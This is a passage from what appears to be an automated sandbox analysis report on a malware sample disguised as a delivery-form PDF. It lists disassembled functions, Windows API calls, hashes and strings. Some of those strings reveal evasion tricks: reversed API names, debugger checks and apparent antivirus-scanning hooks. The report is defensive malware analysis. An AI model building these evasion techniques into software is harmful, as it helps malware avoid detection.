                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoThread
                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                          • API String ID: 4232894706-2493093252
                                                                                          • Opcode ID: b24a03acc283a7e7704c18a8986b3e0d2ceae3735ef1a3def0c10760fbc89c4d
                                                                                          • Instruction ID: 2a4fb9d5847d75f9fb9daceff3f457c2d0bd3b4fa47beca676bf3e9cbe4de0ab
                                                                                          • Opcode Fuzzy Hash: b24a03acc283a7e7704c18a8986b3e0d2ceae3735ef1a3def0c10760fbc89c4d
                                                                                          • Instruction Fuzzy Hash: 05613F35B042489BDB02EBA8D890ADFB7FB9FC9310F50A476E101EB345DA35DD058B95
                                                                                          Function 0294AE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AE40
                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0294AE57
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AEEB
                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 0294AEF7
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 0294AF0B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Read$HandleModule
                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                          • API String ID: 2226866862-113032527
                                                                                          • Opcode ID: 2ef5d94cf4626bad99bef01e2c444f219d98e8d82fafffb99506b991db7d9943
                                                                                          • Instruction ID: 9ace47e4a349f14ff2091f9d9e9eb2fee400514bda06a1aed014e614422964e0
                                                                                          • Opcode Fuzzy Hash: 2ef5d94cf4626bad99bef01e2c444f219d98e8d82fafffb99506b991db7d9943
                                                                                          • Instruction Fuzzy Hash: 8C3188B2A84305BBEB20DF58CC95F5A77ACAF45768F004664FA54EB280DB70E940DB64
                                                                                          Function 0293432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029907C8,?,?,0295D7A8,0293655D,0295C30D), ref: 02934365
                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029907C8,?,?,0295D7A8,0293655D,0295C30D), ref: 0293436B
                                                                                          • GetStdHandle.KERNEL32(000000F5,029343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029907C8), ref: 02934380
                                                                                          • WriteFile.KERNEL32(00000000,000000F5,029343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?), ref: 02934386
                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029343A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleWrite$Message
                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                          • API String ID: 1570097196-2970929446
                                                                                          • Opcode ID: 571ec5cf9983abd16aa35deeed9776c3eee620c4965a5666c5b89ab68425cd3a
                                                                                          • Instruction ID: 7fe7bf3763e06e01a06758fc57d915549dc7539169f4c5b2c27679d77299e72f
                                                                                          • Opcode Fuzzy Hash: 571ec5cf9983abd16aa35deeed9776c3eee620c4965a5666c5b89ab68425cd3a
                                                                                          • Instruction Fuzzy Hash: D1F0B4A1BC83407AFA12B6A0AD56FB9275D4BC5F24F180A04F664A60D0C7A0A0C4CB27
                                                                                          Function 0293AE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0293ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACE1
                                                                                            • Part of subcall function 0293ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293AD05
                                                                                            • Part of subcall function 0293ACC4: GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD20
                                                                                            • Part of subcall function 0293ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADB6
                                                                                          • CharToOemA.USER32(?,?), ref: 0293AE83
                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0293AEA0
                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEA6
                                                                                          • GetStdHandle.KERNEL32(000000F4,0293AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEBB
                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0293AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEC1
                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0293AEE3
                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0293AEF9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 185507032-0
                                                                                          • Opcode ID: c03d079ae092b0d201b7e4060b71677825e1988effaa8ce23abbff33cf283879
                                                                                          • Instruction ID: 581698b1d949876942a36ddf7b6a4e7e164f27ca2b31f7031466f72c4667553e
                                                                                          • Opcode Fuzzy Hash: c03d079ae092b0d201b7e4060b71677825e1988effaa8ce23abbff33cf283879
                                                                                          • Instruction Fuzzy Hash: F21170B25483047AD202FBA4CC80F9B77EDAB84700F40092AB395D60D1DA74E9448F26
                                                                                          Function 0293E514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0293E5AD
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0293E5C9
                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0293E602
                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0293E67F
                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0293E698
                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 0293E6CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                          • String ID:
                                                                                          • API String ID: 351091851-0
                                                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                          • Instruction ID: 026845b766f3cb3c8473be3e34976d46bb5fec3c7af1af6cb05fc4f4d08a9dd9
                                                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                          • Instruction Fuzzy Hash: CE51D676A0062D9BCB26EB98C890BD9B7FDAF8C304F4041E5E549E7241D670AF858F61
                                                                                          Function 02933568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0293358A
                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029335BD
                                                                                          • RegCloseKey.ADVAPI32(?,029335E0,00000000,?,00000004,00000000,029335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029335D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                          • API String ID: 3677997916-4173385793
                                                                                          • Opcode ID: da6741221d93c94468950e3a57c98c057bc818f8088962c45e155b7a7721fcb7
                                                                                          • Instruction ID: 17497ce8b73b05fc0446095ff1ad9cae0427b547bc4b911cc05a6f35fb133650
                                                                                          • Opcode Fuzzy Hash: da6741221d93c94468950e3a57c98c057bc818f8088962c45e155b7a7721fcb7
                                                                                          • Instruction Fuzzy Hash: B801D876A84318BAF712DBA0CD02BBD77ECEB49710F1005A1BA04D65C0E6749610DBA8
                                                                                          Function 029480C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                          • API String ID: 667068680-1372893251
                                                                                          • Opcode ID: fc8da97974fc9a5d8ee5fc6ae1ce4bf10c55deea838a03e0081882954fe584a4
                                                                                          • Instruction ID: 034680710fcd563c7af5b29d8574988ed39e34a70b69789319583fb4da10e24c
                                                                                          • Opcode Fuzzy Hash: fc8da97974fc9a5d8ee5fc6ae1ce4bf10c55deea838a03e0081882954fe584a4
                                                                                          • Instruction Fuzzy Hash: 9E014F75A44308AFEB06EFA8DC42E9E77FEFBCD750F524865F40497640DA30A9108A64
                                                                                          Function 0293A9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0293AA6F,?,?,00000000), ref: 0293A9F0
                                                                                            • Part of subcall function 0293A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0293AA6F,?,?,00000000), ref: 0293AA20
                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 0293AA2B
                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0293AA6F,?,?,00000000), ref: 0293AA49
                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 0293AA54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                          • String ID:
                                                                                          • API String ID: 4102113445-0
                                                                                          • Opcode ID: ec2c3050e7bf59eb3bf0e98c7767106ba9bb0b8cc351c780677205efcb2515c4
                                                                                          • Instruction ID: 499d29a5d9ba8f844b0a6db19a3e2ecdede8fa2cc22f083b6c5bb54eb83da7cf
                                                                                          • Opcode Fuzzy Hash: ec2c3050e7bf59eb3bf0e98c7767106ba9bb0b8cc351c780677205efcb2515c4
                                                                                          • Instruction Fuzzy Hash: CE0126326002487FF703E7B4CD12B6E739EDBC2724F914160F641E66C0D6249E008AA8
                                                                                          Function 0293AA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0293AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0293AAB7
                                                                                            • Part of subcall function 0293A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoThread
                                                                                          • String ID: eeee$ggg$yyyy
                                                                                          • API String ID: 4232894706-1253427255
                                                                                          • Opcode ID: e4f8301f381125c258c116f2c04711ded6e57756f25d7adb28f2c643a6cd88fc
                                                                                          • Instruction ID: b60507d764675b412ec7f9c6b8292ee182d02f8feb2bae8d7ba7837ef578ef30
                                                                                          • Opcode Fuzzy Hash: e4f8301f381125c258c116f2c04711ded6e57756f25d7adb28f2c643a6cd88fc
                                                                                          • Instruction Fuzzy Hash: 7D41D3757046054BD713AB6988902BFB3FBEBC6304B555A6AE4E2C7344E638DD06CA22
                                                                                          Function 02948020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc
                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                          • API String ID: 1883125708-1952140341
                                                                                          • Opcode ID: 56a291d3b0c4b57a95bb46f04cc71b3e0afaedecbd55a20ccdf5ddc69092ab3c
                                                                                          • Instruction ID: 29dedce0a2cbafd5129916eec961096ad2f4803fc9cb4d5f0f83facffb6025af
                                                                                          • Opcode Fuzzy Hash: 56a291d3b0c4b57a95bb46f04cc71b3e0afaedecbd55a20ccdf5ddc69092ab3c
                                                                                          • Instruction Fuzzy Hash: CEF06D31654308BFEB11EFA8DC42DAE77ADFB89B50B924960F40493A10EA30BD108A65
                                                                                          Function 0294EB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,0294EF98,UacInitialize,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,Initialize), ref: 0294EB9A
                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0294EBAC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                          • API String ID: 1646373207-2367923768
                                                                                          • Opcode ID: da062269347050f655cc873a7019fe0baee5052efd694070b7e6ae81c208afc3
                                                                                          • Instruction ID: a0dc53d4107049d6c409a5148857de6c14a2057c04442190b8d941faebe45cce
                                                                                          • Opcode Fuzzy Hash: da062269347050f655cc873a7019fe0baee5052efd694070b7e6ae81c208afc3
                                                                                          • Instruction Fuzzy Hash: 50D08CA2B65B142EFA0276F50CC4C1F02CDA9C557E3301FBDF0A3D20E2EEAAC8121514
                                                                                          Function 0293C3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0295C10B,00000000,0295C11E), ref: 0293C402
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0293C413
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                          • API String ID: 1646373207-3712701948
                                                                                          • Opcode ID: 97a5f96215fdda2770cc67aab8713cf156980bc2ed5b5a9d05515309eac385f6
                                                                                          • Instruction ID: 90e91153067839ad0843e36701a19ad23e9afc2d1ff9b8b7a30211323dc78b31
                                                                                          • Opcode Fuzzy Hash: 97a5f96215fdda2770cc67aab8713cf156980bc2ed5b5a9d05515309eac385f6
                                                                                          • Instruction Fuzzy Hash: CDD0A7A0B44B116EF3035BB1788863336CC9785768F406836E109E5101C77584244FA8
                                                                                          Function 0293E170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0293E21F
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0293E23B
                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0293E2B2
                                                                                          • VariantClear.OLEAUT32(?), ref: 0293E2DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                          • String ID:
                                                                                          • API String ID: 920484758-0
                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                          • Instruction ID: 4ee1c18bc1f29cc13f286fffe0ca9b87364e102fdfe1d3d7024e8b2c87c40f33
